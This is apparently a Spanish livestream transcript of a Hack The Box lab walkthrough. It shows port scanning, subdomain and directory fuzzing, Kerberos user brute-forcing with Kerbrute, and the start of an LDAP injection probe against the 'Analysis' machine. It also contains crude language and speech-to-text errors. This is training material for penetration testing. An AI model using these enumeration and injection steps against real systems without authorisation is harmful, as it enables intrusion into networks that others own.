Chavales, bienvenidos un día más. Estamos a día 5 de junio del 2024 y hoy vamos a estar resolviendo una maquinita Windows de Hack the Box de dificultad difícil que contempla temáticas de directorio activo y que te prepara para un porrón de certificaciones, o sea que va a ser una máquina muy muy interesante. La máquina que vamos a estar haciendo es esta de aquí, la máquina análisis, la IP es la 10-10-11-250 y todo esto es lo que vamos a estar tocando, ¿vale? Sobre la marcha ya sabéis que igual explicaré más cositas o cosas que me vayan viniendo también sobre la marcha, aislado a estos conceptos que vamos a estar tocando y bueno, te prepara para estas certificaciones. El OSCP, el OSCP, el ECPPT de versión 3, sobre todo por la parte de directorio activo y por la parte de hacking web que vamos a estar tocando, que vamos a estar explotando una inyección LDAP y vamos a estar jugando con mucho Python Scripting para automatizar la inyección, pues te puede caer en el EWPT, en el EWPTX de versión 2, que esto está mal, cuidado, ahí está, y en el OSWE de Offensive Security. O sea que es una máquina tocha, muy chula y eso, son de las que me gustan porque ya sabéis que a mí temáticas de directorio activo me la ponen bien dura. Así que nada, vamos a darle caña. En este caso la máquina se llama Analysis, vamos a crear el directorio, vamos a meternos y con MKT, que es esta utilidad, que es una función que tengo previamente definida en la ZCHRC, pues hago MKT y me creo aquí mis tres directorios de trabajo. Yo me voy a meter en el directorio en EWPT para en este punto comenzar con la fase de reconocimiento. Yo sé que la IP es esta, que me la voy a copiar en la clipboard para tenerla ahí al alcance. Y bien, fijaros, yo en este caso estoy viendo si la máquina está encendida. Antes que nada, para no perder el tiempo, he enviado un paquete, una traza ICMP y recibo el paquete de vuelta. O sea que la máquina sé que está encendida y gracias al TTL pues identifico que estoy ante una máquina Windows por su proximidad al valor 128. Como siempre os digo, las máquinas Windows suelen tener de TTL 128 o próximo y las máquinas Linux suelen tener 64. En este caso en Hack the Box siempre veremos que es una unidad menos. Ya sabéis que el TTL de todas formas se puede manipular, se puede cambiar, pero en Hack the Box, que es el entorno en el que nos vamos a estar moviendo casi siempre para explicar cosas y demás, pues normalmente veremos eso, una unidad menos de lo que os estoy mostrando por aquí. De forma alternativa, ya sabéis que tenemos esta utilidad, un script en Python 3 bastante interesante, al que de forma paralela a esta ruta absoluta, voy a aplicarle un VAT para que le echéis un ojo. Bueno, este script en Python 3, quien lo quiera tener, puede poner en el chat esto y se va a compartir un pastebin con toda esta utilidad, que lo que hace, si os fijáis al ejecutarla, es que te pide una IP, bueno, tú le pasas la IP de la máquina víctima y por ti pues te indica ante que estás, que en este caso es una máquina Windows, ¿vale? Hay más formas de identificar si es una máquina Windows o una máquina Linux, pero bueno, lo vamos viendo luego sobre la marcha, pero gracias al ping ya sé que es una máquina Windows. Recordad que lo que yo os recomiendo es que si queréis utilizar esta utilidad, pues que la metáis en alguna ruta del PATH, yo lo tengo por ejemplo metido en User Beam, entonces lo metéis ahí, le dais permisos de ejecución y listo. Ya con esto luego podéis ejecutarlo de forma relativa en cualquier ruta del sistema. Bueno, pues escaneo de puertos, ¿no? Yo sé que la máquina está encendida y ahora sí la quiero vulnerar, si quiero meterme dentro del sistema o detectar alguna falla que me permita explotar X vulnerabilidad y meterme, pues tengo que ver qué puertos están abiertos. Entonces yo normalmente con el parámetro guión P, suelo indicarle que quiero escanear X puertos, en este caso al meterle un guión, le estoy indicando que quiero abarcar el total de puertos existentes, que el rango total son 65.535 puertos. Entonces con esto vamos a escanearlos todos. A mí en este caso como atacante me interesa pillar puertos abiertos, un puerto puede tener diferentes estados, aislado al open, también tenemos el filtered, un puerto puede estar filtrado, que también puede ser interesante pillarlos, pero normalmente de primeras únicamente ya sabéis que me interesan los puertos abiertos, ¿vale? En ciertas situaciones tipo de SSRFs que encontremos, donde queramos colar un internal port discovery a través del SSRF, pues pillar puertos filtrados, si quieres ahorrarte la etapa de fuerza bruta, pues puede venir bien. Entonces le quitamos este parámetro, pero por ahora le dejamos esto. Le voy a meter un Stealth Scan, que es un modo de escaneo bastante sigiloso, a la par que rápido, en la máquina que hicimos antes ayer os expliqué con T-Shark toda la trama de paquetes, a mí no me molesta explicarlo las veces que haga falta, si queréis que lo vuelva a explicar, lo explicamos y no pasamos como vosotros queráis. ¿Queréis que volvamos a explicar el por qué es un modo sigiloso, cómo opera a nivel de traza todo? A mí me da igual, ¿eh? La clave está en que a más lo repitas, pues mejor, porque a más te va a quedar claro el concepto. Y bueno, la gran mayoría dice que sí, ¿no? Está muy bien explicado en la academia, sí, cuanto más mejor. Lo explicamos, venga, pues a tomar por culo. Los que no, mientras tanto podéis ir a por un café, y cuando volváis ya seguramente lo hayamos terminado. Así que mientras tanto, de todas formas lo explico en un rato cuando terminemos el escaneo. Entonces, bueno, le voy a meter también un minrate de 5000 para indicarle que quiero tramitar paquetes no más lentos que 5000 paquetes por segundo. La IP es esta. Y bueno, sobre la marcha, mientras estoy aplicando el escaneo, como no quiero esperar, o sea, no me interesa quedarme esperando hasta que el escaneo concluya para ver qué puertos están abiertos, pues con el verbose, en tiempo de ejecución, puerto que está abierto, puerto que voy a ver por consola ya, y así en paralelo pues voy adelantando trabajo. De resto, si le doy al enter, ya sabéis que normalmente hay un proceso de resolución DNS que a veces se demora cierto tiempo, esto no ha tardado nada, pero yo normalmente lo que hago es quitarlo con el parámetro menos n, y de resto, pues bueno, normalmente a través del protocolo de resolución de direcciones, que es ARP, nmap suele aplicar descubrimiento de hosts para detectar si está activo o no antes de proceder con el escaneo de puertos. Entonces yo normalmente con este parámetro le indico que no quiero que me aplique ese descubrimiento de hosts, ¿vale? Entonces ya con esto el escaneo va a ir bastante rápido, va a ser bastante ágil, y bueno, eso, normalmente de un TCP Connected Scan tradicional que haríamos, pues ya sabéis que el flujo de paquetes del Treeway Handshake es, tú envías un paquete SIM, recibes un SIM ACK y devuelves un ACK, ¿no? De forma que la conexión concluye, ha sido exitosa, se ha entablado, te responde, y en un principio eso a nivel de lock suele dejar un registro de que se ha concluido una conexión, no la dejas abierta, a diferencia de, por ejemplo, con el Stealth Scan, que el flujo de paquetes es envías un SIM, recibes un SIM ACK, y en vez de enviar un ACK envías un Reset Packet, de forma que no concluyes la conexión, la dejas abierta, y eso en parte agiliza a la par que, bueno, se supone que es sigiloso porque al no concluir la conexión no dejas registro a nivel de lock, pero a nivel de paquetes sí que se puede pillar, o sea que realmente hay que tener cuidado con eso. Si lo queréis ver, mismamente, como hicimos la otra vez, pues con T-Shark cómo va todo, vamos a primeramente exportar esto. Yo lo voy a exportar todo en formato grepeable al archivito All Ports, que el formato grepeable es un formato idóneo para que, posteriormente, en este archivito, que es donde va a estar mi evidencia, pues pueda aplicar Regex, por ejemplo, expresiones regulares para filtrar, rápidamente por lo que me interesa. Hay muchos puertos abiertos que no cunda el pánico cuando pasa esto, pero como veo que el puerto 88 está abierto, SMB y demás, pues intuyo que igual estamos ante un... Bueno, normalmente es un DC ante lo que nos estamos enfrentando cuando hay temáticas de directorio activo involucradas, así que lo dicho, seguramente ya tenemos que cambiar el chip a entorno de directorio activo y tener ciertas posibilidades, ciertos vectores de entrada, de numeración y de explotación. Entonces, lo dicho, yo lo que suelo hacer es jugar con esta utilidad, que es una función la cual tengo previamente definida, en la ZCHRC también, y esta utilidad es muy cómoda, que si la queréis tener podéis poner esto por el chat, porque si tú le pasas la captura grepeable de Nmap, tiene que ser específicamente la captura grepeable de Nmap, pues te representa la información más relevante de la captura, y todos los puertos te los copia en la clipboard via XClip, ¿vale? Entonces, CTRL-SHIFT-V, ahí los tenemos, y ahora puedo lanzar un escaneo más exhaustivo sobre estos puertos para ver ante qué me estoy enfrentando. Y ahora con Nmap le podré decir, vale, pues ahora, como quiero saber ante qué me estoy enfrentando, como quiero saber qué es cada cosa con detalle, pues voy a lanzar un conjunto de scripts básicos de reconocimiento, de los que dispone Nmap, que están todos programados en Lua, que son todos estos, de forma que, bueno, no los vas a lanzar todos, pero los más populares los vas a lanzar, y te va a dar una pequeña visual de aspectos importantes a nivel informativo de lo que cada puerto representa a nivel de servicio, y de resto con el parámetro SV le voy a indicar que quiero tratar de determinar o detectar la versión y el servicio que corren para cada uno de estos puertos. Estos dos parámetros se pueden compactar en uno, y ya esto como escaneo final lo voy a exportar en formato Nmap al archivito Targeted, que el formato Nmap, el ON, es para indicarle que tal y como se me va a mostrar la información por consola, pues manteniendo la misma estética, el mismo resultado, pues quiero exportarlo al archivito Targeted, ¿vale? Entonces le damos al Enter, esto va a tardar un poquito más, de momento no voy a estar jugando con T-Shark, porque ahora mismo va a ser un festival, la de paquetes y de cosas que se van a estar pillando, podemos echarle un ojo a sí mismo, y bueno, seguramente que para lanzar todo lo que está haciendo, bueno, ahí veis todo lo que está lanzando, un disparate, entonces bueno, vamos a esperar a que el escaneo concluya, y ahora vemos a nivel de traza de paquetes, pues el Stealth Scam frente al TCP Connected Scam, pues qué diferencias hay y demás, ¿qué es el archivo Targeted? Pero si lo he explicado, cabrón, ¿estamos prestando atención o qué coño estamos haciendo? Si lo he explicado, cabrón, no lo acabo de explicar, coño, ¿será posible? Está jalándose el manguaco, sí, el cabrón se está haciendo una paja, está distraído, cierra el porno, cabrón, y ponte ahí a prestar atención, ¿será posible? Ahí está, tuvo que venir Sullivan para poner orden, ¿eh? Almacena la salida de nmap al tirar una serie de scripts de reconocimiento. ¿Cómo? Almacena la salida de nmap al tirar una serie de scripts de reconocimiento. Vamos a abrir el archivito Targeted, que se ve todo en blanco, recordad que si no lo queréis ver en blanco, como mi cat es un alias a bat, que es como un cat, pero con esteroides, con inyecciones, como virus, pues la idea sería que yo, por ejemplo, le puedo decir, oye, el lenguaje es Java, que aunque no sea Java, va a ser que se vea todo mucho más bonito, ahí está. Entonces, bueno, ahora le echamos un ojo a esto en detalle, pero primeramente, para que veáis rápido, por ejemplo, yo sé que el puerto 88 de Kerberos está abierto, ¿no? Entonces, bueno, si yo le lanzo un TCP Connected Scan a esta IP sobre este puerto, pues lo he dicho, tú con T-Shark, si crearas una query tal que te permitiera filtrar por esa traza de paquetes, por ejemplo, como vamos a hacer un TCP Connected Scan, el flujo de paquetes va a ser SIM, que es el que envías tú, tú recibes el SIM ACK, y luego tú respondes con un ACK, ¿no? Vamos a echarle un ojo a eso. Entonces, a nivel de FLAX, SIM, que es el primero que quiero pillar, tiene que estar en 1, entonces esto lo vamos a igualar a 1, y por otro lado, ACK, que es el que voy a estar luego igualando a 1, en este caso tiene que valer 0, y en cuanto a puerto destino, que creo que se indicaba de esta forma, es el 88, ¿no? El que quiero pillar. Entonces, nada, si tú lanzas el escaneo por arriba, fijaros que ahí obtenemos el SIM, entonces tú envías esta comunicación al puerto destino por TCP 88 de la máquina víctima, y luego ese puerto 88, que ahora parte de un source, que viene de la máquina víctima, es decir, aquí en vez de Destination Port, hay que poner source port, porque viene de la máquina víctima, y se comunica por un puerto aleatorio que se abre de nuestro equipo para mandarnos la información, que eso ya lo gestiona nuestro equipo, pues lo que tú recibes es un SIM ACK, por tanto la FLAG SIM y la FLAG ACK tiene que estar a 1, para que tú ahora puedas capturar ese paquete, y ahí veis que recibimos un SIM ACK, ¿no? ¿Aislado al SIM ACK? Pues ahora, lo que nosotros enviamos es un ACK para los TCP Connect Scan, de forma que concluyes la conexión, el 3-Way Handshake, que sería, 3-Way Handshake, de forma que si yo ahora filtro por ACK, ACK, esto va a estar en 0, esto va a estar en 1, el puerto ahora es el destino al que le envío el ACK, y normalmente vas a recibir dos paquetes, el ACK y el Reset ACK, que es el paquete que se envía cuando conoces el contexto de los paquetes previamente enviados, cuando se entabla correctamente la conexión, ¿vale? Entonces, bueno, si le das al Enter, y envías por aquí el escaneo, ahí obtenemos el ACK que enviamos nosotros al destino y luego el Reset ACK. En cambio, si yo ahora, por ejemplo, hago el Stealth Scan, pues lo dicho, ¿por qué se dice que es sigiloso? Porque no envías el ACK final, de forma que no concluyes la conexión, fijaros que abajo no estoy recibiendo nada, y la razón es porque lo que se envía es un Reset Packet, ¿vale? Si tú ahora todo esto lo quitas y filtras únicamente por un Reset Packet al puerto destino 88, que es el último paquete que se envía en el Stealth Scan, pues ahí lo obtenemos, ¿no? Puerto 88 y Reset Packet. De forma que, bueno, esa es la idea de por qué es sigiloso, porque no concluyes la conexión, la dejas abierta y listo. Y en parte es ágil, te da más agilidad de cara al escaneo, ¿vale? Entonces, bien, pues ahora de cara al... Como esto es mucho, cuando hay mucha información, ya sabéis que yo lo suelo exportar esto en formato XML, para luego pasarle XSLTProc, para convertirlo a un formato HTML, montarme una web y poder verlo un poco más visual todo. Entonces, bueno, a lo mejor el escaneo habría rentado hacerlo así, pero también en formato XML y llamarlo Targeted XML, por ejemplo. Vamos a esperar un poquito. ¿Qué es un ACK? ¿Qué es un ACK? Vamos a esperar a que el escaneo concluya, a ver si esto lo recibimos. Savitar, ¿crees que SyncThink es seguro para sincronizar el KeePass, el Obsidian, con el móvil? Ya tendría que estar terminando. Vamos a ver. Creo que esto, si le dabas al Enter, te mostraba cuánto tardaba o cuánto quedaba. Bueno, 62%. Vamos a esperar un poquito. A ver. Estudien mucho sobre redes. Ahí está. Recordad que preguntas del tipo ¿Qué es eso Internet? Este tipo de preguntas la buscas así de sencillo. Va a ser un tutorial ahí potente. ¿Qué es ACK? Mirad qué maravilla el tema del Internet. Es que es un disparate. Pero entonces, ¿qué es el archivo Targeted? Bueno, eso ya sí que os lo tengo que explicar yo. Pero nada, eso ya os lo expliqué antes, coño. ACK como el kilo. ¿A como el kilo? Sí, eso es. Justamente. Vale, pues ahora lo tenemos por aquí en formato XML. Entonces, bueno, todo esto hay una utilidad que es xl-t-proc que le pasas el archivito XML y te lo transforma en un output HTML, ¿vale? Entonces esto lo voy a meter aquí como index.html me voy a meter al directorio content me monto un servidor HTTP por el puerto 80 y si yo era por aquí pues pongo localhost voy a ver la misma información de los puertos pero un poco mejor, ¿no? Lo ideal sería el dark reader tornarlo a off y bueno, pues por ahí lo vemos todo. Puerto 53, puerto 80 en un formato un poco más visual. Entonces, vale, ¿qué haría yo en este punto? Veo que el puerto 53 está abierto. O sea que yo por SMB al estar enfrentándome a seguramente un DC viendo que el puerto 88 está abierto y demás, ¿no? De Kerberos. Al ver que el puerto 53 está abierto yo por SMB puedo pillar seguramente el nombre de dominio para, pues a lo mejor a través de ciertas consultas DNS poder aplicar ataques de tipo transferencia de zona entre otras cosas para enumerar posibles subdominios válidos sin aplicar ataques de fuerza bruta dado que veo que el puerto 80 está abierto que bueno, pone not found pero a lo mejor si se aplica virtual hosting poniendo el dominio pues sí que puedo ver la página en cuestión. Entonces, bueno, ya veo vectores. Al estar el puerto 88 abierto yo ya veo una posibilidad de enumerar usuarios con Kerberute a través de su modo de operatoria enum user o user enum creo que era user enum para eso mediante un ataque de fuerza bruta determinar qué usuarios válidos existen aunque también con RPC Client probaría a conectarme haciendo uso de un null session para ver si puedo enumerar usuarios del directorio activo y si no pues recordad que también podemos probar a conectarnos más como el usuario guest como hicimos en su día y en caso de que no podamos enumerar usuarios en un DOM users pues podemos aplicar RID Cycling Brute Force para mediante un ataque de fuerza bruta pues aplicar fuerza bruta al RID y poder pillar usuarios válidos a través de ciertas consultas de resto puedo tratar de enumerar recursos compartidos a nivel de red también jugando con SMB Client con CrackMapExec mismo que CrackMapExec también tiene la opción de RID Cycling para aplicar fuerza bruta con el parámetro guión guión RID guión brute y de resto pues bueno MySQL esto nada veo que está el WinRM activo o sea que si algún usuario que pille a lo mejor a través de la numeración de Kerberos por fuerza bruta o lo que corresponda pues puedo tratar de ver si ese usuario por alguna casual forma parte del grupo Remote Management Users para luego pues poder probar a conectarme sin bueno claro tengo que disponer de la credencial pero podría tener una consola interactiva empleando EvilWinRM de resto hay puertos abiertos altos pero esto lo vamos a ignorar y como mucho bueno considerar que en caso de que logremos enumerar usuarios válidos pues algo que podríamos hacer es jugar con ataques de tipo ASR Proast porque al tener un listado de usuarios válidos y da igual que no conozcamos la contraseña podríamos tratar de obtener un TGT un Ticket Granting Ticket que nos permita a través de un hash que sería como lo veríamos reflejado pues craquearlo por fuerza bruta y si disponemos de alguna credencial en el mejor de los casos pues podríamos intentar un Kerberosting Attack para ver si algún usuario es Kerberosteable y para la CRPROAST pues lo dicho recordad que cada usuario debe de no disponer de autenticación previa de Kerberos no debe de requerirla que es lo que nos suele salir con la utilidad esta de InPacket Get NP Users que es la que usaremos cuando tengamos un listado de usuarios potencial simplemente le indicamos el dominio y ya está y trataríamos de obtener los TGTs para el Kerberosting es TGS Ticket Granting Service vale entonces bueno pues la idea sería vamos a comenzar echándole un ojo a la página a ver que es lo que hay por aquí y vale not found http error 404 pues nada aquí no hay nada pero a lo mejor teniendo el dominio si se aplica virtual hosting lo dicho cuidado porque no es lo mismo acceder con la IP que acceder a través del dominio son cosas distintas aquí vemos esto de Microsoft HTTP poco más así que vamos a jugar con Kragmapexec me voy a ir al directorio Kragmapexec vamos a correr el Kragmapexec para numerar por SMB este servidor y bueno vemos que el nombre es DC de Domain Controller es un Domain Controller Analysis de forma que eso veo que es una máquina Windows 10.0 el SMB está firmado y bueno el dominio es Analysis.htb esto está interesante porque de primeras nuestro sistema no sabe lo que es Analysis.htb de forma que vamos a abrirnos el etc.host y la idea sería que cuando hagamos alusión o referencia a esta IP pues perdón cuando hagamos referencia a este dominio pues quiero que me resuelva a esta IP a la 10.129.230.179 vale lo de que esté firmado o no esté firmado te puede influir en ataques de tipo SMB Relay en entornos de empresa y de directorio activo cuando quieres aplicar Relaying para capturar hashes net NTLM de versión 2 pues eso si está firmado es un poco complejo el desplegar el ataque con el responder mismo y bueno de cara al Relaying puede ser complejo el poder eso aplicar Relaying para derivar la conexión a otro equipo poder pillar la SAM a lo mejor de algún usuario cuya conexión pilla es privilegiada de un usuario privilegiado que tenga privilegios en el equipo destino que especifiques con el NTLM Relay y eso te da ciertas complicaciones a la hora de aplicar ese ataque del SMB Relay si no está firmado pues no pasa nada despliegas el ataque envenenas la red que recordad que responder es un envenenador de tráfico LLMNR NBTNS DNS entre todo aplica un par de envenenamientos de todo tipo y eso y si no está firmado pues lo tienes mucho más fácil y en máquinas de este tipo cuando estás por VPN de todas formas recordad que el SMB Relay no funciona porque la idea es que tienes que estar en físico en la compañía o si no emplear un equipo como proxy y a través de este pues lanzar el responder o las herramientas que correspondan para desde ahí aplicar el envenenamiento ¿vale? entonces bueno esta es la IP esta es la el dominio así que si yo ahora hago alusión a Analysis.htb ahí vemos que ya me responde y nada pues si yo pongo por aquí Analysis.htb fijaros que ahora sí que me responde lo que os comenté no es lo mismo poner la IP que el dominio y bueno esto en un principio vemos que hay un IS por detrás un Internet Information Services y nada vemos esto estamos en Home fijaros la ruta bueno esto está en formato comentado esto no nos va no es nada o sea no es que no probéis aquí tonterías tipo Home Usuario lo que sea porque no tiene nada que ver a los que estáis preguntando por CrackMapExec os recomiendo echar un vistazo a la herramienta NetExec que es su sucesora sigue la misma sintaxis que CME si yo he seguido la guía del propio repositorio de CrackMapExec que te indica a nivel de instalación de fuente de source pues como instalarlo empleando Poetry que con CrackMapExec secas me daba problemas y creo que se puede instalar con PIP3 creo pero me daba ciertos conflictos y nada lo tuve que instalar empleando Poetry bueno vemos aquí cositas ¿no? Planning Integration haciendo Hovering que esto es pasar el cursor por encima fijaros que abajo a la izquierda pues vemos Analysis.htb no me está llevando esto a ningún lado esto me lleva a esto pero no hay nada y bueno si hacemos Hovering en todas estas cositas no vamos a ver que nos lleva a ningún lado o sea que esto cuidado que igual es un Rabbit Hole no vamos a llegar a nada no acabo de entender por qué si pones la IP directamente no resuelvo y al resolverlo por VHOST si tú piensa que por ejemplo si tú estás en una máquina Linux y empleas Apache o en Jinx tú puedes configurar incluso a nivel de subdominio para que en función de lo que tú pongas en el navegador te resuelva a diferentes rutas del sistema de forma que eso una cosa es poner la IP pero otra cosa es poner un dominio específico que cuando se aplique la resolución el sistema diga vale estás poniendo este dominio o este subdominio pues te voy a llevar a una ruta del sistema donde están alojados los recursos que corresponden a la web que en este caso es esta y te la voy a mostrar pues eso esa es la idea vale pues aquí no tiene pinta podríamos tratar de aplicar un ataque de fuerza bruta con GoBuster para por ejemplo en esta URL pues mediante un ataque de fuerza bruta empleando un diccionario tal que el típico que sería Discovery WebContent Director Release 23 Medium y empleando un total de 200 hilos para lanzar 200 tareas en paralelo pues algo que podríamos tratar de hacer es decirle oye cada una de las líneas que componen este diccionario que es este de aquí que le voy a quitar los comentarios preferiblemente esto luego te rompe un poco el output ahí está pues quiero probar cada una de estas líneas para emplearlo como si fuese un directorio una ruta existente del propio dominio en la web para detectar pues que recursos existen entonces bueno hay un directorio Images un directorio JS CSS el de Images hay uno de VAT podríamos probar a ver aquí en Images que hay no hay directory listing o sea que no podemos ver las imágenes que hay por ahí guardadas y tenemos un directorio VAT que también pone forbidden de primeras no podemos ver que hay a lo mejor podríamos enumerar dado que es un IS pues por archivos con extensión cuáles eran ASP o ASPX pues podríamos probar eso por ejemplo pero ya os adelanto de que no vamos a poder ver nada de hecho aquí creo que no hay nada como tal no vamos a encontrar nada interesante recordad que una forma de saber si es un Windows o un Linux además de que el WAPALYZER ya nos lo chiva por aquí Windows Server es jugando con las mayúsculas y minúsculas si yo por ejemplo aquí pongo una B mayúscula y aquí una T fijaros que me sigue poniendo forbidden en Windows es case insensitive a diferencia de en Linux que si pongo esto me va a buscar a nivel de ruta un directorio con nombre B mayúscula A minúscula y T mayúscula entonces esta es otra forma de saber si estás ante una máquina Windows que es el caso y nada eso como aquí no hay nada existe la posibilidad de que puedan existir subdominios como el puerto 53 está abierto hay veces que conviene o puede resultar interesante ver si hay o existe la posibilidad de aplicar un ataque de transferencia de zona aquí estamos enumerando los nameservers que no hay gran cosa aunque vemos bueno DC analysis.analysis.htb pero esto creo que no es nada importante AXFR y fijaros que no hemos podido hacer un ataque de transferencia de zona o sea que en un principio no puedo enumerar tendríamos en tal caso que aplicar un ataque de fuerza bruta que es lo que voy a hacer ya sea con GoBuster o con UFUD para variar con UFUD en formato colorizado por ejemplo y ocultando el código de estado 404 que es el not found que es el que a mí no me interesa filtrar normalmente pues empleando un total de 200 hilos que es para lanzar 200 tareas en paralelo yo voy a emplear un diccionario de seglists específico para subdominios que es el de discovery.dns subdomains top1million que bueno tiene bueno top1million pero son 110.000 posibles subdominios vale si tú tienes esta url analysis.htb claro la gran pregunta ¿cómo enumeras subdominios? pues normalmente hay una cabecera que es host a través de la cual pues tú pondrías el subdominio correspondiente por ejemplo recordad que UFUD tiene una palabra propia interna que es FUD de forma que si tú por ejemplo aquí pones analysis.htb si tú envías una consulta al servidor con esta cabecera aquí va a ir probando cada uno de los subdominios de este diccionario de forma que cuando el subdominio existe la respuesta cambia y lo que podríamos tratar de hacer es aprovecharnos de los cambios de total de caracteres o de palabras que bueno en este caso creo que no hay que filtrar por mucho más pues por ejemplo aquí hay un subdominio que ha probado en esta cabecera internal que en vez de devolvernos un 404 que son los que estamos ocultando te devuelve un 403 un forbidden en este caso de forma que esto lo que quiere decir es que el subdominio existe o hay algo que aunque te ponga forbidden pues me hace pensar que como subdominio es válido entonces podríamos incorporarlo por aquí .analysis.htb echarle un ojo internal.analysis.htb y bueno pone esto forbidden access denied vemos por aquí lenguaje de programación php no conocemos archivos php existentes pero podemos aplicar fuerza bruta además de aplicar un ataque de fuerza bruta para el descubrimiento de directorias esto se puede hacer con gobuster o con ufuz o con dirsearch u otras herramientas la url es esta y el diccionario va a ser este el que empleamos siempre 23medium mejor que es el que siempre usamos pues empleando un total de 200 hilos vamos a darle al enter y bueno vamos a ver que nos encuentra y fijaros para las rutas o directorios users o employees el código de estado es un 301 te redirige a lo mismo pero con una barra al final de forma que bueno esto parece que existe si yo pongo users me pone filer directory not found curioso internal.analysis.htb vale vamos a poner employees a ver este otro employees filer directory not found curioso vamos a suponiendo que existe enumerar archivos existentes dentro o sea imaginaos que a lo mejor users pues tiene un archivo php porque yo he visto que la web trabaja con php pues algo que podríamos hacer ahora es decir vale yo sé que supuestamente el directorio users existe pues ahora quiero probar cada una de estas líneas para aplicar un ataque de fuerza bruta para en vez de encontrar directorios encontrar archivos con extensión php que te va a incorporar por cada línea que tú pruebas vale entonces enter y bueno fijaros list.php esto existe o sea que si yo pongo users list.php te pone que falta un parámetro vale y en employees vamos a ver que es lo que hay a ver si hay alguna cosita employees login php tenemos un panel de autenticación al parecer login php y vale tenemos esto de forma que bien panel de autenticación por un lado y por otro lado una web que me dice que falta un parámetro bueno suponiendo que esto espera un parámetro esto lo podríamos hacer con ufuz si tal para variar pues empleando este diccionario el user share seglist discovery web content directory list 23 medium lo que podría ser es que para esta url claro cuál sería la idea de si existiera un parámetro interrogante parámetro igual a algo como yo no conozco el nombre del parámetro yo aquí le puedo poner fuz de forma que voy a ir sustituyendo cada una de las líneas de este diccionario aquí y en función de las respuestas ahora vemos por qué filtrar y por qué no para poder hacernos la idea de cuándo el parámetro es correcto entonces bueno si esperamos fijaros que todas las líneas que prueba todas las palabras te devuelven 17 caracteres eso quiere decir que esto en total son 17 caracteres debería vamos a contabilizarlo 17 de forma que bueno si siempre te muestra missing parameter quiero pensar que cuando el parámetro sea válido eso quiere decir que no va a poner 17 entonces yo algo que podría aquí hacer es decirle oye hide characters 17 ocúltame las respuestas que a nivel de total de caracteres tengan 17 entonces ya no te lo muestra y esto es esperar esperar un poquito a que esto encuentre algún parámetro entonces mientras esto se hace algo que podríamos hacer es con rpc client ir tratando de numerar posibles usuarios existentes a nivel de dominio entonces voy a ampliar un null session primeramente ojo jacavis que tal tío gracias por la write ahí bienvenidos a todos estamos haciendo una maquinita windows de directorio activo una ahí bastante guapa nada espero que vaya todo bien gracias por el apoyo y bienvenidos a todos como en casa podéis sentaros ahí y meter la cañita con nosotros vale enter me conecto en un dom users no puedo numerar usuarios del dominio por tanto este vector fuera algo que podríamos hacer también es intentar autenticarnos como un usuario guest con contraseña nada por ahora como si fuéramos un usuario de invitado que esto el otro día fue con lo que aplicamos el concepto de RID Cycling Brute Force Attack para tratar de numerar a través de una fuerza bruta al campo del RID tendríamos el SID y luego el RID pues tratar de encontrar usuarios válidos aplicando fuerza bruta pues podríamos tratar de ver si esto nos deja conectarnos y pone NT Status Logon Failure o sea que en este caso no nos podemos autenticar como invitados esto recordad que bueno CrackMapExec os lo automatiza de forma que tendríamos la opción de sin contraseña pero indicándole que el usuario es invitado pues jugar con RID Brute para aplicar el RID Cycling pero se pone Logon Failure o sea que en este caso estamos jodidos por ahí vamos a ver por aquí esto y vale parámetro name cuidado con eso que el parámetro name te devuelve 406 caracteres ¿por qué? vamos a verlo interrogante name igual a test y cuidado search result username last name first name company vale pues de primeras que probaría yo aquí voy a probar por ejemplo admin claro como no sé si son usuarios del dominio existentes no puedo a lo mejor por administrator tampoco podríamos tratar de aplicar fuerza bruta por aquí sin ningún problema sería una vía potencial para enumerar usuarios válidos y nos montamos un script en python para en base a lo que salga aquí que quiero pensar que cuando no sale si esto lo quito vale pone siempre contact si esto no sale o si el usuario es válido quiero poner que quiero pensar que te lo refleja aquí pues podríamos aplicar fuerza bruta o por ejemplo ya que care veros está activo el puerto 88 pues con la herramienta care brute podríamos tratar de aplicar un ataque de fuerza bruta ¿no? también así que podríamos por ejemplo irnos a esta herramienta de ropnop me la clono en el directorio actual de trabajo y bueno esta herramienta recordad que está programada en go de forma que para compilarla yo recomiendo emplear estos parámetros el menos s y el menos w porque hace que el peso final esté un poco reducido para que no pese tanto que aún así es súper liviana en cuanto a peso respecto a esta herramienta y luego además le suelo pasar upx para reducir un poquito más el peso ¿vale? de forma que en este caso estamos tratando ante un binario de 2.1 megas el cual si ejecutamos pues lo dicho tiene una opción user enum que nos permite enumerar usuarios válidos del dominio a través de querberos empleando un ataque de fuerza bruta entonces la idea sería que yo aquí con user enum en este caso pues eso le indica cuál es el dc la ip y con menos del dominio pues guión guión dc tenemos la ip guión d tenemos el dominio y el diccionario de usuarios que voy a emplear es user share set lists usernames y este mismo chatonames million usernames que es el que siempre siempre empleamos que tiene un total de 8 millones 295 mil 455 posibles usuarios entonces bueno eso va a tardar pero va a probar un montón de usuarios que oye en caso de que sea válido te lo va a reportar querbrute entonces enter esto es dejarlo ahí corriendo y bueno si pillamos alguno válido puede estar interesante para luego probar a ponerlo por aquí mientras en paralelo pues probamos por ejemplo una inyección sql y aquí probaría una comilla no veo que pase nada comilla or 1 igual a 1 guión guión espacio guión para comentar el resto de la query no me está reportando nada considerando que es válido vamos a poner and sleep 1 o bueno sleep 5 para ver si la web tarda 5 segundos en respondernos y ver si es una inyección basada a ciegas que podamos luego scriptear en python y todo esto enter no ha tardado 5 segundos pero ha desaparecido algo ha pasado ahí por los paréntesis a lo mejor o por los comentarios vale por los paréntesis si quito estos paréntesis vale si yo aquí pongo esto desaparece por tanto paréntesis eso que quiere decir tema de paréntesis de cara a inyecciones los paréntesis en qué tipo de inyecciones se suelen emplear no entiendo por qué instalaste crackmapexec en lugar de netexec y crearle un alias y eso bueno próximamente seguramente instale el netexec que es lo que toca pero por ahora ahí operó con crackmapexectia ldap efectivamente inyecciones ldap yo aquí por ejemplo esto se podría probar bueno antes que nada estamos pillando usuarios jdu ajonson cwilliams estos son usuarios válidos existentes en el dominio mientras esto ocurre la idea va a ser opd vale la idea va a ser la siguiente esto tiene pinta de ser inyección ldap tiene pinta hay que probar cosas pero por ejemplo ahora que tenemos un usuario jdu si lo pongo aquí jdu no le ha molado ajonson vamos a ver ajonson tampoco le ha molado cwilliams vamos a ver cwilliams tampoco wsmith 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 vale está tardando pero no tiene pinta de que sea válido vamos a esperar un poquito más a ver cuál es más pilla la idea es que en caso de que esto sea una inyección ldap que una forma de probarlo sería por ejemplo admin no existe administrator no existe pero si es ldap lo que hay por detrás una posible inyección a aplicar es jugar con el asterisco en el sentido de que si existe un usuario que empieza por a pues dentro de la query ldap que mete tu valor en el campo de la query correspondiente pues te suele interpretar esto en formato regex tipo empieza por a y no sé en qué 